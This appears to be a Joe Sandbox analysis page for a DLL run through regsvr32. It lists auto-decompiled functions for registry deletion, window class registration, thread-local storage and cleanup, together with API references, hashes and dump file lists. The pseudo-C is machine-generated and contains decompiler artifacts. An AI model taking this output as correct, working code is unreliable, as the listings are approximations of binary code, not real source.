Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$RectScrollVisible
String ID:
API String ID: 2639402888-0
Opcode ID: c6436d8fdbf3b8a2b2235d5c25a65f36b3820a4b0492ae5a8b332bbeaaab615e
Instruction ID: 53d8950ac382f03f3b42d1256983cd6ea1501ada0ee261b3a5cf7ecc347621aa
Opcode Fuzzy Hash: c6436d8fdbf3b8a2b2235d5c25a65f36b3820a4b0492ae5a8b332bbeaaab615e
Instruction Fuzzy Hash: FA216A3160061AAFDF259F54CC48EAF7BBAFF88741F108429FA05962A0E771AC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10065A71 Relevance: 7.6, APIs: 5, Instructions: 63
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10065A71(void* __eflags, void* _a4) {
				char _v268;
				signed char* _t8;
				void* _t10;
				void* _t22;
				char* _t26;

				_t26 = E1001BFD1(_a4);
				_t8 =  &(_t26[lstrlenA(_t26)]);
				if(_t8 != 0) {
					while(1) {
						 *_t8 =  *_t8 & 0x00000000;
						E1001C969(_t26, _t8);
						_pop(_t22);
						if(RegOpenKeyA(0x80000000, _t26,  &_a4) != 0) {
							goto L7;
						}
						if(RegEnumKeyA(_a4, 0,  &_v268, 0x105) == 0) {
							_push(1);
							_pop(0);
						}
						RegCloseKey(_a4);
						if(0 == 0) {
							RegDeleteKeyA(0x80000000, _t26);
							_t8 = E1001BCB9(_t22, _t26, 0x5c);
							if(_t8 != 0) {
								continue;
							}
						}
						goto L7;
					}
				}
				L7:
				E1001A722(_t26);
				_t10 = 1;
				return _t10;
			}

0x10065a86
0x10065a8f
0x10065a91
0x10065a98
0x10065a98
0x10065a9d
0x10065aa6
0x10065ab2
0x00000000
0x00000000
0x10065ace
0x10065ad0
0x10065ad2
0x10065ad2
0x10065ad6
0x10065ade
0x10065ae2
0x10065aeb
0x10065af4
0x00000000
0x00000000
0x10065af4
0x00000000
0x10065ade
0x10065a98
0x10065af6
0x10065af7
0x10065aff
0x10065b04

APIs

lstrlenA.KERNEL32(00000000), ref: 10065A89
RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 10065AAA
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 10065AC6
RegCloseKey.ADVAPI32(?), ref: 10065AD6
RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 10065AE2

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumOpenlstrlen
String ID:
API String ID: 160701936-0
Opcode ID: e3d77bc7fb653b8d1e9b4dcc8aa0f7b8175bde6309f3c04e5941f3f1e391248e
Instruction ID: 0d44f20d9311a2a8f7e3ce0ac54b43ea66a15b1e16ea8f889b564b4d9c2d628a
Opcode Fuzzy Hash: e3d77bc7fb653b8d1e9b4dcc8aa0f7b8175bde6309f3c04e5941f3f1e391248e
Instruction Fuzzy Hash: 5A01D6722015257EF3159B65DCC9FEF3B9DEF017A2F10002AF904D9190EFB19E8186A1

Uniqueness

Uniqueness Score: -1.00%

Function 10042C61 Relevance: 7.6, APIs: 5, Instructions: 52
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10042C61() {
				CHAR* _t35;
				WNDCLASSA* _t37;
				void* _t40;
				void* _t42;

				E1001A9E0(0x10076554, _t40);
				_t37 =  *(_t40 + 8);
				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
					L5:
					_push(1);
					_pop(0);
					L6:
					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
					return 0;
				}
				if(RegisterClassA(_t37) != 0) {
					if( *((intOrPtr*)(E10064B8B() + 0x14)) != 0) {
						E10064CD8(1);
						 *(_t40 - 4) = 0;
						_t9 = E10064B8B() + 0x34; // 0x34
						_t35 = _t9;
						lstrcatA(_t35, _t37->lpszClassName);
						 *(_t40 + 0xa) = 0xa;
						 *((char*)(_t40 + 0xb)) = 0;
						lstrcatA(_t35, _t40 + 0xa);
						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
						E10064D48(1);
					}
					goto L5;
				}
				goto L6;
			}

0x10042c66
0x10042c70
0x10042c77
0x10042c89
0x10042cde
0x10042cde
0x10042ce0
0x10042ce1
0x10042ce6
0x10042cef
0x10042cef
0x10042c95
0x10042ca5
0x10042ca9
0x10042cae
0x10042cbf
0x10042cbf
0x10042cc3
0x10042cc8
0x10042cce
0x10042cd1
0x10042cd3
0x10042cd9
0x10042cd9
0x00000000
0x10042ca5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10042C66
GetClassInfoA.USER32(?,?,?), ref: 10042C81
RegisterClassA.USER32(?), ref: 10042C8C
lstrcatA.KERNEL32(00000034,?,00000001), ref: 10042CC3
lstrcatA.KERNEL32(00000034,?), ref: 10042CD1

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 5c1a87278c0cdece76be391575d4714dc79b5672531dee29a8d1057adee6b6fa
Instruction ID: a7c57bb3f769842cd4d1d0e51496ce5dbd8613e391aded616485c449d15b8cc3
Opcode Fuzzy Hash: 5c1a87278c0cdece76be391575d4714dc79b5672531dee29a8d1057adee6b6fa
Instruction Fuzzy Hash: 1711E179A04259BEDB00DF648C81ADD7BB9EF05350F01452AF806A7152C770A645DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10016C6D Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 10016C8D
SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10016C95
lstrlenA.KERNEL32(?), ref: 10016C9D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 10016CC3
SysAllocString.OLEAUT32 ref: 10016CCA

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocByteStringlstrlen$CharMultiWide
String ID:
API String ID: 1909028937-0
Opcode ID: b6309400ee77ae6ffb8eab27e623aee6886476245540aef397a762c75cec8228
Instruction ID: 376c25f67db74303ea231fd9f66cafcbf44cf82be9132b10e128a2ef0b14d847
Opcode Fuzzy Hash: b6309400ee77ae6ffb8eab27e623aee6886476245540aef397a762c75cec8228
Instruction Fuzzy Hash: 6301F736500126BFE7109F99CC899AE77ECFF09361B014112F958D6110D734D8448BE1

Uniqueness

Uniqueness Score: -1.00%

Function 1001EA51 Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001EA51() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x10090cf0);
				if(_t16 == 0) {
					_t16 = E1001DDC5(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x10090cf0, _t16) == 0) {
						E1001A9AD(0x10);
					} else {
						E1001EA3E(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x1001ea5f
0x1001ea67
0x1001ea6b
0x1001ea76
0x1001ea7c
0x1001eaa6
0x1001ea8f
0x1001ea90
0x1001ea96
0x1001ea9c
0x1001eaa0
0x1001eaa0
0x1001ea7c
0x1001eaad
0x1001eab7

APIs

GetLastError.KERNEL32(00000001,?,1001CB86,10026E6F,?,10022837,?,?,00000001,?,?,?,?,10021473,?,?), ref: 1001EA53
TlsGetValue.KERNEL32 ref: 1001EA61
SetLastError.KERNEL32(00000000,?,?,10021473,?,?,?,10020EEB,1001BD58,?,1001BD58), ref: 1001EAAD

Part of subcall function 1001DDC5: HeapAlloc.KERNEL32(00000008,?,?,?,?,1001E9EB,00000001,00000074), ref: 1001DE1A

TlsSetValue.KERNEL32(00000000,?,?,10021473,?,?,?,10020EEB,1001BD58,?,1001BD58), ref: 1001EA85
GetCurrentThreadId.KERNEL32(?,?,10021473,?,?,?,10020EEB,1001BD58,?,1001BD58), ref: 1001EA96

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: ad22c830ecbb4f25f896498b37fb69ec8a6ab0bbf1a031c9bc29c8959e054f33
Instruction ID: b718a6f37874a4822b2d5db37eddd5c65beffe6a17df527f3cde4022b9834414
Opcode Fuzzy Hash: ad22c830ecbb4f25f896498b37fb69ec8a6ab0bbf1a031c9bc29c8959e054f33
Instruction Fuzzy Hash: DEF096356003739FF729AB74DC4965E3A91FF857B1B110226F9599B2A0CF30EC81C692

Uniqueness

Uniqueness Score: -1.00%

Function 100651E2 Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100651E2(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t5 =  *((intOrPtr*)(_t15 + 0x14));
				if(_t5 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t5 + 4));
						E100654EF(_t15, _t5, 0);
						_t5 = _t14;
					} while (_t14 != 0);
				}
				_t6 =  *(_t15 + 0x10);
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection(_t15 + 0x1c);
				return _t6;
			}

0x100651e3
0x100651e6
0x100651eb
0x100651ee
0x100651ee
0x100651f4
0x100651f9
0x100651fb
0x100651fb
0x10065203
0x1006520a
0x1006520a
0x100651fb
0x1006520e
0x10065213
0x1006521c
0x1006521f
0x10065226
0x10065226
0x10065230
0x10065238

APIs

TlsFree.KERNEL32 ref: 100651EE
GlobalHandle.KERNEL32(?), ref: 10065216
GlobalUnlock.KERNEL32(00000000), ref: 1006521F
GlobalFree.KERNEL32(00000000), ref: 10065226
DeleteCriticalSection.KERNEL32 ref: 10065230

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: 1f7c5a346c7210c4ea418209a6c7a76ee6f18643a745cfde62993af52c12c10e
Instruction ID: 2ad986c120333fb150d1808dc69e909c5a90e0ed01c95e1e7aba117c4b0eeae2
Opcode Fuzzy Hash: 1f7c5a346c7210c4ea418209a6c7a76ee6f18643a745cfde62993af52c12c10e
Instruction Fuzzy Hash: 9EF0BE317002225BE7109F3DDC8CA6B76EEFFC6662B02010AF82AD3290DB21DC028660

Uniqueness

Uniqueness Score: -1.00%

Function 1001F334 Relevance: 7.5, APIs: 5, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001F334() {
				struct _CRITICAL_SECTION* _t1;
				struct _CRITICAL_SECTION** _t4;

				_t4 = 0x10090d10;
				do {
					_t1 =  *_t4;
					if(_t1 != 0 && _t4 != 0x10090d54 && _t4 != 0x10090d44 && _t4 != 0x10090d34 && _t4 != 0x10090d14) {
						DeleteCriticalSection(_t1);
						_t1 = E1001A722( *_t4);
					}
					_t4 =  &(_t4[1]);
				} while (_t4 < 0x10090dd0);
				DeleteCriticalSection( *0x10090d34);
				DeleteCriticalSection( *0x10090d44);
				DeleteCriticalSection( *0x10090d54);
				DeleteCriticalSection( *0x10090d14);
				return _t1;
			}

0x1001f33c
0x1001f341
0x1001f341
0x1001f345
0x1001f368
0x1001f36c
0x1001f371
0x1001f372
0x1001f375
0x1001f383
0x1001f38b
0x1001f393
0x1001f39b
0x1001f39f

APIs

DeleteCriticalSection.KERNEL32(00000000,?,?,1001EA25,1001A8F7,1001A950,?,?,?), ref: 1001F368
DeleteCriticalSection.KERNEL32(?,?,1001EA25,1001A8F7,1001A950,?,?,?), ref: 1001F383
DeleteCriticalSection.KERNEL32 ref: 1001F38B
DeleteCriticalSection.KERNEL32 ref: 1001F393
DeleteCriticalSection.KERNEL32 ref: 1001F39B

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: a6e7a6761a490ea49f9cde636f830741d3212cc22725ee0d3cd95c972957f1a1
Instruction ID: 0a5893c22590dbffe17922a0b538eda0720769681e6683b9a01461a613dfc7cc
Opcode Fuzzy Hash: a6e7a6761a490ea49f9cde636f830741d3212cc22725ee0d3cd95c972957f1a1
Instruction Fuzzy Hash: F1F089318061E4ADDEA8F759CC888597B51EFD02503560176F8AD56074C539FDC0DD91

Uniqueness

Uniqueness Score: -1.00%

Function 10017255 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E10017255(void* __eflags) {
				signed int _t48;
				intOrPtr _t58;
				void* _t60;
				void* _t62;

				E1001A9E0(0x10077d5c, _t60);
				 *((intOrPtr*)(_t60 - 0x10)) = _t62 - 0x20;
				_t58 =  *((intOrPtr*)(_t60 + 8));
				 *(_t60 - 4) =  *(_t60 - 4) & 0x00000000;
				E1001666C(_t58,  *(_t60 + 0xc));
				if(( *(_t60 + 0xd) & 0x00000060) != 0) {
					L10:
					__imp__#9(_t60 + 0xc);
					 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
					return _t58;
				}
				_t48 =  *(_t60 + 0xc) & 0x0000ffff;
				if(_t48 > 0x11) {
					goto L10;
				}
				switch( *((intOrPtr*)(_t48 * 4 +  &M100173D7))) {
					case 0:
						goto L10;
					case 1:
						__ecx = __esi;
						__eax = E1001666C(__esi,  *((intOrPtr*)(__ebp + 0x14)));
						goto L13;
					case 2:
						_push( *((intOrPtr*)(__ebp + 0x14)));
						goto L12;
					case 3:
						__ecx = __esi;
						 *__esp =  *((intOrPtr*)(__ebp + 0x14));
						__eax = E10018536(__esi, __esi);
						goto L13;
					case 4:
						__ecx = __esi;
						 *__esp =  *((long long*)(__ebp + 0x14));
						__eax = E1001858B(__esi, __esi, __ecx);
						goto L13;
					case 5:
						__ecx = __esi;
						__eax = E10016693(__esi,  *((intOrPtr*)(__ebp + 0x14)));
						_push( *((intOrPtr*)(__ebp + 0x18)));
						L12:
						__ecx = __esi;
						__eax = E100184C4(__esi);
						goto L13;
					case 6:
						_push( *((intOrPtr*)(__ebp + 0x14)));
						__imp__#149();
						__edi = __eax;
						__ecx = __esi;
						__eax = E10016693(__esi, __edi);
						if(__edi > 0) {
							__ecx = __esi;
							__eax = L1005081F(__esi,  *((intOrPtr*)(__ebp + 0x14)), __edi);
						}
						goto L10;
					case 7:
						__ecx = __ebp - 0x18;
						__eax = E1003B524(__ebp - 0x18, __esi);
						__eax =  *((intOrPtr*)(__ebp + 0x14));
						_push(__ebp + 8);
						_push(0x100826b8);
						__ecx =  *__eax;
						_push(__eax);
						if(__eax < 0) {
							__eax =  *((intOrPtr*)(__ebp + 0x14));
							_push(__ebp + 8);
							_push(0x10082240);
							__ecx =  *__eax;
							_push(__eax);
							__eax =  *((intOrPtr*)( *__eax))();
						}
						__eax = E1001689B(__ebp, __eax);
						__eax =  *((intOrPtr*)(__ebp + 8));
						_push(__ebp - 0x28);
						_push(__eax);
						__ecx =  *__eax;
						 *(__ebp - 4) = 1;
						__eax = E1001689B(__ebp, __eax);
						__ecx = __esi;
						__eax = E10016693(__esi,  *((intOrPtr*)(__ebp - 0x28)));
						__ecx = __esi;
						__eax = E1001666C(__esi,  *((intOrPtr*)(__ebp - 0x24)));
						__ecx = __esi;
						E1001666C(__esi,  *((intOrPtr*)(__ebp - 0x22))) = __ebp - 0x20;
						__ecx = __esi;
						__eax = L1005081F(__esi, __ebp - 0x20, 8);
						__eax =  *((intOrPtr*)(__ebp + 8));
						_push(1);
						_push(__ebp - 0x18);
						__ecx =  *__eax;
						_push(__eax);
						__eax = E1001689B(__ebp, __eax);
						__eax =  *((intOrPtr*)(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
						_push(__eax);
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))();
						goto L10;
					case 8:
						_t49 = E10016649(_t58,  *((intOrPtr*)(_t60 + 0x14)));
						L13:
						_t58 = _t49;
						goto L10;
				}
			}

0x1001725a
0x10017265
0x10017268
0x1001726e
0x10017274
0x1001727d
0x100172fc
0x10017300
0x1001730d
0x10017316
0x10017316
0x1001727f
0x10017286
0x00000000
0x00000000
0x10017288
0x00000000
0x00000000
0x00000000
0x100172a1
0x100172a3
0x00000000
0x00000000
0x10017319
0x00000000
0x00000000
0x100172bd
0x100172bf
0x100172c2
0x00000000
0x00000000
0x100172ce
0x100172d0
